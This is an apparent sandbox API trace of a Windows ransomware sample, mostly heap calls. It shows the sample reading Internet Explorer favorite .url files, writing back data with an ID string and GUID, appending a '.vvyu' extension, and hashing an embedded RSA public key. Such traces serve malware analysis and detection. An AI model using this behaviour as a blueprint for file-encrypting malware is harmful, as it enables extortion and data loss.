[0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a670 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e95140 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f00 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x2e950f8 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f18 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f60 [0197.142] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x24) returned 0x2cff270 [0197.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x158) returned 0x2e98a80 [0197.143] RtlReAllocateHeap (Heap=0x620000, Flags=0x0, Ptr=0x2e98a80, Size=0x218) returned 0x2e9aca8 [0197.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x558) returned 0x2ea6a68 [0197.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0197.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cff270 | out: hHeap=0x620000) returned 1 [0197.143] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0197.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a40 [0197.143] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f60 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x9) returned 0x2ea2f48 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78ae0 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10e) returned 0x2c99af8 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x2e83cf0 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x58) returned 0x2c3a610 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85dc8 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x104) returned 0x2c99d28 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85da8 [0197.144] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a50 [0197.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0197.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.144] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0197.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0197.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0197.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.145] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a670 | out: hHeap=0x620000) returned 1 [0197.146] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e9aca8 | out: hHeap=0x620000) returned 1 [0197.146] GetCurrentThreadId () returned 0x66c [0197.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95c90 [0197.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x82) returned 0x2ea5800 [0197.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x2c) returned 0x2cd9680 [0197.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67c168 [0197.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x148) returned 0x2e96a80 [0197.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0197.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ae0 [0197.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95d98 [0197.146] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.147] GetCurrentThreadId () returned 0x66c [0197.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.147] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xeb) returned 0x2e914a8 [0197.147] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x64) returned 0x673558 [0197.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x673558 | out: hHeap=0x620000) returned 1 [0197.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e914a8 | out: hHeap=0x620000) returned 1 [0197.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95b88 [0197.148] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0197.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4c) returned 0x2ccaf50 [0197.148] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a40 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95ea0 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2fa8 [0197.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a90 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78aa0 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ab0 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ac0 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a70 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78ad0 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f48 [0197.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a90 [0197.149] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78a30 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78af0 [0197.149] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b00 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x4) returned 0x2c78b10 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f60 [0197.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b00 | out: hHeap=0x620000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x18) returned 0x2c85d88 [0197.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78af0 | out: hHeap=0x620000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f30 [0197.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78b10 | out: hHeap=0x620000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fc0 [0197.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78a30 [0197.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a70 | out: hHeap=0x620000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f90 [0197.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a30 | out: hHeap=0x620000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc) returned 0x2ea2f78 [0197.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2fd8 [0197.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f78 [0197.150] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f90 | out: hHeap=0x620000) returned 1 [0197.150] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x8) returned 0x2c78aa0 [0197.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a40 | out: hHeap=0x620000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x14) returned 0x2c85d48 [0197.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78aa0 | out: hHeap=0x620000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1c) returned 0x2e83cf0 [0197.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10) returned 0x2ea2f48 [0197.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a90 | out: hHeap=0x620000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x204) returned 0x2d08630 [0197.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fa8 | out: hHeap=0x620000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99af8 [0197.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fd8 | out: hHeap=0x620000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x210) returned 0x2ea6a68 [0197.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e83cf0 | out: hHeap=0x620000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x10c) returned 0x2c998c8 [0197.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ab0 | out: hHeap=0x620000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x108) returned 0x2c99c10 [0197.151] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f48 | out: hHeap=0x620000) returned 1 [0197.151] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x200) returned 0x2ea6c80 [0197.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99af8 | out: hHeap=0x620000) returned 1 [0197.152] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x100) returned 0x2e95fa8 [0197.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ae0 | out: hHeap=0x620000) returned 1 [0197.152] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67c168 | out: hHeap=0x620000) returned 1 [0197.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95b88 | out: hHeap=0x620000) returned 1 [0197.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95fa8 | out: hHeap=0x620000) returned 1 [0197.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d48 | out: hHeap=0x620000) returned 1 [0197.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99c10 | out: hHeap=0x620000) returned 1 [0197.153] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6c80 | out: hHeap=0x620000) returned 1 [0197.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c998c8 | out: hHeap=0x620000) returned 1 [0197.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ac0 | out: hHeap=0x620000) returned 1 [0197.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f78 | out: hHeap=0x620000) returned 1 [0197.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78ad0 | out: hHeap=0x620000) returned 1 [0197.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2fc0 | out: hHeap=0x620000) returned 1 [0197.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85d88 | out: hHeap=0x620000) returned 1 [0197.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f60 | out: hHeap=0x620000) returned 1 [0197.154] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f30 | out: hHeap=0x620000) returned 1 [0197.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e96a80 | out: hHeap=0x620000) returned 1 [0197.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9680 | out: hHeap=0x620000) returned 1 [0197.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95d98 | out: hHeap=0x620000) returned 1 [0197.155] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea2f18 | out: hHeap=0x620000) returned 1 [0197.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e950f8 | out: hHeap=0x620000) returned 1 [0197.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d08630 | out: hHeap=0x620000) returned 1 [0197.156] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95ea0 | out: hHeap=0x620000) returned 1 [0197.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ccaf50 | out: hHeap=0x620000) returned 1 [0197.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c99d28 | out: hHeap=0x620000) returned 1 [0197.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85dc8 | out: hHeap=0x620000) returned 1 [0197.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c78a50 | out: hHeap=0x620000) returned 1 [0197.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c85da8 | out: hHeap=0x620000) returned 1 [0197.157] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c3a610 | out: hHeap=0x620000) returned 1 [0197.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e912b0 | out: hHeap=0x620000) returned 1 [0197.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd95d8 | out: hHeap=0x620000) returned 1 [0197.158] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2d0d410 | out: hHeap=0x620000) returned 1 [0197.158] WriteFile (in: hFile=0x568, lpBuffer=0x2e915e0*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x312fb14, lpOverlapped=0x0 | out: lpBuffer=0x2e915e0*, lpNumberOfBytesWritten=0x312fb14*=0x80, lpOverlapped=0x0) returned 1 [0197.159] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0197.159] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x85, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.159] WriteFile (in: hFile=0x568, lpBuffer=0x2e95c90*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2e95c90*, lpNumberOfBytesWritten=0x312fb50*=0x100, lpOverlapped=0x0) returned 1 [0197.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e95c90 | out: hHeap=0x620000) returned 1 [0197.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x60) returned 0x2cb45f0 [0197.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x428) returned 0x2ea6a68 [0197.160] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", cchWideChar=-1, lpMultiByteStr=0x2ea6a68, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="uyKE3UuexCE2KAbQ1PTkFn73qJrKsQWCvyN1YHYt", lpUsedDefaultChar=0x0) returned 41 [0197.160] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x430) returned 0x2ea6e98 [0197.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.160] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cb45f0 | out: hHeap=0x620000) returned 1 [0197.160] WriteFile (in: hFile=0x568, lpBuffer=0x2ea6e98*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x2ea6e98*, lpNumberOfBytesWritten=0x312fb50*=0x28, lpOverlapped=0x0) returned 1 [0197.161] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6e98 | out: hHeap=0x620000) returned 1 [0197.161] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0197.161] WriteFile (in: hFile=0x568, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x312fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x312fb50*=0x26, lpOverlapped=0x0) returned 1 [0197.161] CloseHandle (hObject=0x568) returned 1 [0197.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x2e915e0 [0197.162] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x890) returned 0x2ea6a68 [0197.163] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2e915e0 | out: hHeap=0x620000) returned 1 [0197.163] MoveFileW (lpExistingFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie add-on site.url"), lpNewFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE Add-on site.url.vvyu" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie add-on site.url.vvyu")) returned 1 [0197.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2ea6a68 | out: hHeap=0x620000) returned 1 [0197.164] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.164] VirtualFree (lpAddress=0x2900000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0197.168] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c6ead8 | out: hHeap=0x620000) returned 1 [0197.168] FindNextFileW (in: hFindFile=0x2cfe100, lpFindFileData=0x312fba4 | out: lpFindFileData=0x312fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7996bf30, ftCreationTime.dwHighDateTime=0x1d70509, ftLastAccessTime.dwLowDateTime=0x7996bf30, ftLastAccessTime.dwHighDateTime=0x1d70509, ftLastWriteTime.dwLowDateTime=0x7ee4e6b0, ftLastWriteTime.dwHighDateTime=0x1d70509, nFileSizeHigh=0x0, nFileSizeLow=0x85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="IE site on Microsoft.com.url", cAlternateFileName="IESITE~1.URL")) returned 1 [0197.168] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x2c7ce40 [0197.169] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xa6) returned 0x2c6ead8 [0197.169] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2c7ce40 | out: hHeap=0x620000) returned 1 [0197.169] PathFindExtensionW (pszPath="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url") returned=".url" [0197.169] CreateFileW (lpFileName="C:\\Users\\kEecfMwgj\\Favorites\\Microsoft Websites\\IE site on Microsoft.com.url" (normalized: "c:\\users\\keecfmwgj\\favorites\\microsoft websites\\ie site on microsoft.com.url"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x568 [0197.170] GetFileSizeEx (in: hFile=0x568, lpFileSize=0x312fb40 | out: lpFileSize=0x312fb40*=133) returned 1 [0197.170] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x2900000 [0197.173] SetFilePointerEx (in: hFile=0x568, liDistanceToMove=0x5f, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0197.173] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x312fb78, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb78*=0x26, lpOverlapped=0x0) returned 1 [0197.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x2cd9648 [0197.175] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x2cd9648 | out: hHeap=0x620000) returned 1 [0197.175] SetFilePointer (in: hFile=0x568, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0197.175] ReadFile (in: hFile=0x568, lpBuffer=0x2900000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x312fb70, lpOverlapped=0x0 | out: lpBuffer=0x2900000*, lpNumberOfBytesRead=0x312fb70*=0x85, lpOverlapped=0x0) returned 1 [0197.175] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.175] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x1f1) returned 0x2e912b0 [0197.175] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.175] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA6Rpr555pjA\\/rRQ04gINW\\\\nyfjAZBx4tSyxjhPxyhCThnyGX1R4Ctr4xlU5tMmmPUFsfuUDU5lGuviI94N1wbON\\\\nVaQGY7iaD+q8ohUqZM67L+pFOnn1yIjPM7ut9007Awts+x6O3MEv\\/CKueJ4JdGlD\\\\nooUsYQf078+ERSOfrPWJxayAFK5UfS1lylrtD0OwOxYXiJb9K9atd46qDvj\\/RweK\\\\nGVkzHgynHb2M8A+s10VR7v1a6nJ9rGFO5Z0Jdttak4ws29fs5J3ZQfzq8Axr9+lw\\\\nIQEOxvWOTURN+BgOwCA0vL7Ie5Kedwp7VaByxdM4gbVgWOmkeu1ABtXNM+p3T9P6\\\\nVwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 492 [0197.175] CryptAcquireContextW (in: phProv=0x312fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x312fa50*=0x67c168) returned 1 [0197.177] CryptCreateHash (in: hProv=0x67c168, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x312fa58 | out: phHash=0x312fa58) returned 1 [0197.177] CryptHashData (hHash=0x2cfe140, pbData=0x2e912b0, dwDataLen=0x1f1, dwFlags=0x0) returned 1 [0197.177] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x0, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x312fa54) returned 1 [0197.177] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11) returned 0x2c85dc8 [0197.177] CryptGetHashParam (in: hHash=0x2cfe140, dwParam=0x2, pbData=0x2c85dc8, pdwDataLen=0x312fa54, dwFlags=0x0 | out: pbData=0x2c85dc8, pdwDataLen=0x312fa54) returned 1 [0197.177] GetLastError () returned 0x0 [0197.177] CryptDestroyHash (hHash=0x2cfe140) returned 1 [0197.177] CryptReleaseContext (hProv=0x67c168, dwFlags=0x0) returned 1 [0197.177] HeapFree (in: 